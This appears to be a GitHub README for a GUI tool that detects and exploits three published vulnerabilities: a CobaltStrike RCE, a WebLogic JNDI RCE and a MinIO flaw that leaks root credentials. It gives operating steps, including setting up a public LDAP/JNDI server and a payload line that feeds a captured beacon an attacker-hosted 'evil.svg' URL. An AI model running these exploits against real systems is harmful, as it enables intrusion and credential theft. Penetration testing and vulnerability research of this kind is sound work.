A testing tool for CobaltStrike RCE (CVE-2022-39197), WebLogic RCE (CVE-2023-21839) and MinIO (CVE-2023-28432)
A GUI-based vulnerability detection and exploitation tool for these three vulnerabilities.
1. Running the jar requires Java 8.
2. Works against a single target; not suitable for scanning multiple IPs.
3. When building, the WebLogic exploit depends on wlfullclient.jar, which you must add yourself.
`java -jar Gui-poc-test.jar`
Usage: there are two buttons, Detect and Exploit; because each vulnerability is used differently, the tool's interface shows hints for each one.
Enter the target; no port is required (the default is 9000 and can be changed, see GuiDemo.java line 144 in the source).
The tool echoes back MINIO_ROOT_USER, MINIO_ROOT_PASSWORD and similar values.
![image](https://private-user-images.githubusercontent.com/55196564/287996332-42161c10-1acf-4866-92ae-19be85be5f14.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjA3NTgzOTcsIm5iZiI6MTcyMDc1ODA5NywicGF0aCI6Ii81NTE5NjU2NC8yODc5OTYzMzItNDIxNjFjMTAtMWFjZi00ODY2LTkyYWUtMTliZTg1YmU1ZjE0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTIlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzEyVDA0MjEzN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWY0ZjA3YmY5NmEzZGIzNTI5YjI3NjM0YTY4NDAwNjA3YmU0NDdjNTRjY2I1ZDI2MjRhNzk5M2FkZjc4OTg5NDQmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.g-JSNaMZtCOxPnGyrlQf-s_RFZKN_C5CLeiXSlKAp5w)
Enter the target IP, port and LDAP server address.
Detection:
(screenshot)
Note: exploitation requires setting up your own LDAP server (reachable from the public internet).
- JNDI server tool: use JNDIExploit.jar to start the LDAP and web services, see https://github.com/WhiteHSBG/JNDIExploit
(screenshot)
- After selecting the vulnerability, the method for checking it yourself is shown by default; enter the detection code in the CS listener to test whether the vulnerability exists.
- Exploitation prerequisite: the other side's trojan (exe) has already been obtained locally.
- Runtime requirements: Windows, Python 3, and frida-tools installed via pip3.
- Python has been added to the PATH environment variable.
- Set up your own server to host the svg file and the jar package, reachable by the other side.
- Enter the absolute path of the exe and the svg URL separated by a space, then click Execute to carry out the counter-exploitation.
- The jar contents are up to you; the demo pops up a calculator.
- The default trojan name is beacon and can be changed, see cve_2022_39197.py line 28 in the source.
Payload example:
`beacon.exe http://127.0.0.1:4444/evil.svg`
Result: the trojan runs on Windows and the CS client on the Mac receives the check-in,
while the CS side executes the jar contents and pops up a calculator.
(screenshot)
Windows logs the CS access address.
![image](https://private-user-images.githubusercontent.com/55196564/288145249-a96832d6-eb2a-4d77-b652-8078fa685411.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjA3NTgzOTcsIm5iZiI6MTcyMDc1ODA5NywicGF0aCI6Ii81NTE5NjU2NC8yODgxNDUyNDktYTk2ODMyZDYtZWIyYS00ZDc3LWI2NTItODA3OGZhNjg1NDExLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA3MTIlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNzEyVDA0MjEzN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQyNmU2ZDAzOGU5YmFhZmY2ZWI5N2QxYjNkMWJhYjg1MzZkNjU5NzBmMzA4NDIwMGUzOTZkNzViOWQ3MmJkMGYmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.NT5Fj1KptAy48Jc_rzbxL9hU1kjA6zgTBUgMeA6UERo)
How it works: https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md
https://github.com/4ra1n/CVE-2023-21839
https://github.com/DXask88MA/Weblogic-CVE-2023-21839